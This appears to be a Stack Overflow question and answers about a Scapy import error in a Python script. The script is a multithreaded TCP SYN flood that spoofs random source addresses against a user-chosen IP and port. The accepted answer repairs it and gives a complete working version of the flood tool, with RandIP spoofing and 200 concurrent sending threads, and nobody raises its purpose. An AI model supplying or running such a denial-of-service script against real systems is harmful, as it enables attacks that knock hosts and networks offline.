# Scapy in Python script

Tags: python, scapy

I'm writing a script in Python which use Scapy but my problem is that the exception is:

> i = IP()
>
> NameError: global name 'IP' is not defined

This is my script:

```
import random
from scapy import *
import threading
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

print ("Which IP would you like to choose?")
ip = raw_input("-->")
print ("Which Port would you like to choose?")
port = raw_input("-->")

class sendSYN(threading.Thread):
    global ip, port

    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        # Method -
        i = IP()
        i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
        i.dst = ip

        t = TCP()
        t.sport = random.randint(1, 65535)
        t.dport = port
        t.flags = 'S'

        send(i/t, verbose=0)

count = 0
while True:
    if threading.activeCount() < 200:
        sendSYN().start()
        count += 1
        if count % 100 == 0:
            print ("\rPackets SYN\t:\t\t\t%i" % count)
```

What should I do to fix it?

Comment: What you expect that `IP` to be?

Comment: @Kasramvd When you use scapy and you want to make a packet you use the statement `IP(src="...",dst="...")`. So I want the `IP()` to be the ip packet creation. Read here: [Scappy Usage - Generating sets of packets](http://www.secdev.org/projects/scapy/doc/usage.html#generating-sets-of-packets)

Comment: It seems that your program does not recognize what IP is, could you check whether it actually gets defined under scapy?

Comment: You didn't imported `IP` anywhere!

Comment: @Kasramvd so if I import Scapy it doesn't mean that I also imported `IP`?

Comment: No if it is a sub class of `scrapy` you need to access it by putting dot after parent class name like `scrapy.IP`

Comment: @Kasramvd `i = scapy.IP()
AttributeError: 'module' object has no attribute 'IP'`

Comment: What _OS_ are you using? How have you installed _scapy_?

Answer (score 5, accepted):

**import IP/TCP**

You can import all the layers scapy provides directly from the `scapy.layers.*` subpackage. This is fine as long as you do not require any other functionality like send/sendp/sniff/... or you require some pretty magical layers like ASN.1 that fail and raise an exception if some global initialization that is usually set with importing scapy.all is missing.

The specific import for IP() and TCP() (check your scapy/layers/inet.py)

```
from scapy.layers.inet import IP, TCP
```

would be enough as long as you'd only use them for de-/serialization (e.g. assembling/disassembling packets) but since you also require send() you have to import scapy.all like [Semih Yagcioglu](https://stackoverflow.com/users/170671/semih-yagcioglu) suggested. 
Please note that according to the [scapy manual](http://www.secdev.org/projects/scapy/doc/installation.html) the import line changed from `from scapy import *` (scapy v1.x) to `from scapy.all import *` (since scapy v2.x) therefore the following should be fine for you:

```
from scapy.all import send, IP, TCP
```

Notice that importing scapy.all is pretty slow as it wildcard imports all the subpackages and does some initialization magic.
That said, you should try to avoid unnecessary wildcard imports (coding style; even though there is not much difference in case of scapy)

```
from scapy.all import *
```

**python 2.7**

scapy v2.3.1 is compatible with python 2.7 on linux. 
However it is not that trivial to have it fully functional on windows, see [problems with scapy on windows](https://stackoverflow.com/questions/5447461/running-scapy-on-windows-with-python-2-7), especially with sending packets over [phys wifi nics](https://stackoverflow.com/questions/29878958/scapy-error-sending-packets). Typically windows people run python2.6 with scapy 2.3.1 (note that there might be permission issues when scapy tries to get raw socket access on certain windows versions). To spare you some headaches I strongly recommend to run it on linux (vbox is fine).

**working example of your code**

The following code is working fine for me on linux, py2.7 scapy 2.3.1:

```
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import threading
import random
from scapy.all import IP, TCP, RandIP, send, conf, get_if_list
logging.basicConfig(level=logging.DEBUG, format='%(asctime)-15s [%(threadName)s] %(message)s')

class sendSYN(threading.Thread):
    def __init__(self, target):
        threading.Thread.__init__(self)
        self.ip, self.port = target

    def run(self):
        pkt = IP(src=RandIP(),
                 dst=self.ip)/TCP(flags='S',
                                    dport=self.port,
                                    sport=random.randint(0,65535))

        send(pkt)
        logging.debug("sent: %s"%pkt.sprintf("{IP:%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport%}"))

if __name__=='__main__':
    conf.verb = 0       # suppress output
    print ("Which Interface would you like to choose? %r"%get_if_list())
    iface = raw_input("[%s] --> "%get_if_list()[0]) or get_if_list()[0]
    if iface not in get_if_list(): raise Exception("Interface %r not available"%iface)
    conf.iface = iface
    print ("Which IP would you like to choose?")
    ip = raw_input("-->")
    print ("Which Port would you like to choose?")
    port = int(raw_input("-->"))

    count = 0
    while True:
        if threading.activeCount() < 200:
            sendSYN((ip, port)).start()
            count += 1
            if count % 100 == 0:
                logging.info ("\rPackets SYN\t:\t\t\t%i" % count)
```

- fixed import
- uses logging instead of print
- passes target to class instance instead of using globals
- added interface selection (must have for windows as scapy uses linux style interface names for both linux and windows which is why you may have to guess the correct one for windows)
- globally sets scapy verbosity
- uses RandIP() Field instead of manually building a random IP
- TCP.sport/dport expects an integer therefore you have to parseInt the value read from stdin.
- prints sent packets IP/port using snprintf()

Comment: i got error : ```IndexError: Layer [Radius] not found``` while try to import Radius layer, how fix it?

Answer (score 1):

I think you should make the necessary imports for what seems to be missing.

**Try this:**

```
from scapy.all import IP
```

**Or this**:

```
from scapy.all import *
```

Comment: For some reason, I got the Scapy module, but when I try to import `scapy.all` it says that there is no module for it, but I am 100% positive that I do because I am using PyCharm and I installed the Scapy module in there

Comment: That's quite interesting, a quick search returned that all submodules seems to be stacked under scapy.all and you should be able to import them like from scapy.all import *

Comment: Could you please dive into the package and ensure that that the correct hierarchy is achived?

Comment: I got the scapy module, but `scapy.all` returns `import scapy.all blahblahblah import pcapy as pcap
ImportError: No module named pcapy`

Comment: I haven't worked with scapy before, but I'll try to replicate your problem.

Comment: Which version did you install? There seems to be more than one on PyPi

Comment: Here is **EVERY** package that I got [My Packages Pic](http://postimg.org/image/tluk9xdvf/)

Comment: I think that because Scapy works only at Python 2.6 and I got python 2.7

Comment: No, that's not the case. I was able to run it. I think the problem is that there is no longer an IP. There are however are other modules that starts with IP prefix. I think this will solve your problem but you should look into them.

Answer (score -1):

It looks like you are using python3 by your "print()" but when you wanted to get an input from the user you used "raw_input" instead of "input"